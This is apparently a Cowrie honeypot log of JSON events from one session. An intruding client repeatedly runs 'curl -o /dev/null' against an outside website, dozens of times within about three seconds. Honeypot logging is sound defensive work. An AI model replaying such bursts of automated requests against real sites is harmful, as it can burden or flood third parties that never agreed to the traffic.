{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:36.345445Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:36.388868Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:36.389890Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:36.428241Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:36.429677Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:36.472328Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:36.473345Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:36.568396Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:36.569451Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:36.606517Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:36.607553Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:36.644755Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:36.645774Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:36.780579Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:36.782002Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:36.829545Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:36.830778Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:36.871572Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:36.872815Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:36.910891Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:36.912188Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:36.949650Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:36.950943Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:37.059092Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:37.060503Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:37.098013Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:37.099439Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:37.136940Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:37.138435Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:37.175857Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:37.176930Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:37.213607Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:37.214608Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:37.250924Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:37.251916Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:37.289327Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:37.290395Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:37.331361Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:37.332504Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:37.373048Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:37.374611Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:37.443984Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:37.445072Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:37.481967Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:37.483226Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:37.521633Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:37.523003Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:37.560367Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:37.561445Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:37.598783Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:37.599833Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:37.637326Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:37.638733Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:37.675819Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:37.676956Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:37.717543Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:37.718738Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:37.767252Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:37.768750Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:37.811239Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:37.812319Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:37.852013Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:37.853272Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:37.898931Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:37.900300Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:37.939765Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:37.940845Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:37.978086Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:37.979283Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:38.106217Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:38.107849Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:38.200554Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:38.201749Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:38.333858Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:38.335062Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:38.372527Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:38.374160Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:38.416028Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:38.417350Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:38.470089Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:38.471297Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:38.529129Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:38.530656Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:38.573647Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:38.574709Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:38.611595Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:38.612612Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:38.653124Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:38.654406Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:38.692117Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:38.693136Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:38.730807Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:38.731885Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:38.769874Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:38.771678Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:38.814969Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:38.815968Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:38.903250Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:38.904285Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:38.951353Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:38.952666Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:38.991345Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:38.992412Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:39.069368Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:39.070466Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:39.176984Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:39.178445Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:39.216890Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:39.217918Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:39.255143Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:39.256168Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:39.292616Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:39.293558Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:39.331077Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:39.332072Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:39.382844Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:39.383988Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:39.426153Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:39.427214Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:39.465723Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:39.466713Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:39.506006Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:39.507056Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:39.544288Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:39.545343Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:39.586042Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:39.587078Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:39.624387Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:39.625374Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
